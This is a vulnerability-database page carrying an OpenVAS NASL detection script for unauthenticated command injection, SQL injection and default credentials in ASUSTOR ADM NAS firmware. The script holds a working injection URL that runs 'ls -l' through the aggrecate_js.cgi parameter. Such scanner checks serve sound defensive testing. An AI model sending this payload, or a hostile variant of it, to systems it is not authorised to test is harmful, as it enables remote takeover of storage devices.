ASUSTOR ADM <= 3.1.2.RHG1 Multiple Vulnerabilities - Active Check
🗓️ 29 Jun 2018 00:00:00Reported by Copyright (C) 2018 Greenbone AGType
openvas🔗 plugins.openvas.org👁 125 Views
| Reporter | Title | Published | Views | Family All 37 |
|---|---|---|---|---|
| ASUSTOR ADM 3.1.0.RFQ3 - Remote Command Execution / SQL Injection Vulnerabilities | 15 Aug 201800:00 | – | zdt | |
| ADM 3.1.2RHG1 - Remote Code Execution Exploit | 17 Aug 201800:00 | – | zdt | |
| CVE-2018-11511 | 16 Aug 201800:00 | – | attackerkb | |
| CVE-2018-11510 | 17 Aug 201815:14 | – | circl | |
| CVE-2018-11511 | 5 Oct 202508:40 | – | circl | |
| ASUSTOR ADM SQL Injection Vulnerability | 17 Aug 201800:00 | – | cnvd | |
| ASURTOR NAS ADM Remote Command Execution Vulnerability | 3 Jul 201800:00 | – | cnvd | |
| ASUSTOR ADM Remote Command Execution Vulnerability | 21 Aug 201800:00 | – | cnvd | |
| Asustor ADM Command Injection (CVE-2018-11510) | 19 Jun 201800:00 | – | checkpoint_advisories | |
| CVE-2018-11509 | 16 Aug 201820:00 | – | cve |
10
# SPDX-FileCopyrightText: 2018 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/a:asustor:adm";
if (description)
{
script_oid("1.3.6.1.4.1.25623.1.0.141251");
script_version("2023-08-22T05:06:00+0000");
script_tag(name:"last_modification", value:"2023-08-22 05:06:00 +0000 (Tue, 22 Aug 2023)");
script_tag(name:"creation_date", value:"2018-06-29 14:18:00 +0200 (Fri, 29 Jun 2018)");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_tag(name:"severity_vector", value:"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_tag(name:"severity_origin", value:"NVD");
script_tag(name:"severity_date", value:"2019-10-03 00:03:00 +0000 (Thu, 03 Oct 2019)");
script_cve_id("CVE-2018-11509", "CVE-2018-11510", "CVE-2018-11511");
script_tag(name:"qod_type", value:"remote_vul");
script_tag(name:"solution_type", value:"VendorFix");
script_name("ASUSTOR ADM <= 3.1.2.RHG1 Multiple Vulnerabilities - Active Check");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2018 Greenbone AG");
script_family("Web application abuses");
script_dependencies("gb_asustor_adm_http_detect.nasl");
script_mandatory_keys("asustor/adm/http/detected");
script_require_ports("Services/www", 8000);
script_tag(name:"summary", value:"ASUSTOR ADM is prone to multiple vulnerabilities.");
script_tag(name:"vuldetect", value:"Sends a crafted HTTP GET request and checks the response.");
script_tag(name:"insight", value:"The following vulnerabilities exist:
- CVE-2018-11509: Default credentials and remote access
- CVE-2018-11510: Unauthenticated Remote Command Execution
- CVE-2018-11511: Blind SQL Injections");
script_tag(name:"affected", value:"ASUSTOR ADM version 3.1.2.RHG1 and prior.");
script_tag(name:"solution", value:"Update to the latest version.");
script_xref(name:"URL", value:"https://packetstormsecurity.com/files/148919/ASUSTOR-NAS-ADM-3.1.0-Remote-Command-Execution-SQL-Injection.html");
script_xref(name:"URL", value:"https://github.com/mefulton/CVE-2018-11510");
exit(0);
}
include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");
if (!port = get_app_port(cpe: CPE, service: "www"))
exit(0);
if (!get_app_location(cpe: CPE, port: port, nofork: TRUE))
exit(0);
url = "/portal/apis/aggrecate_js.cgi?script=launcher%22%26ls%20-l%26%22";
if (http_vuln_check(port: port, url: url, pattern: "[drwx-]+.*root.*root", check_header: TRUE)) {
report = http_report_vuln_url(port: port, url: url);
security_message(port: port, data: report);
exit(0);
}
exit(99);
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Aug 2023 00:00Current
9.5High risk
Vulners AI Score9.5
CVSS 27.5
CVSS 39.8
EPSS0.4476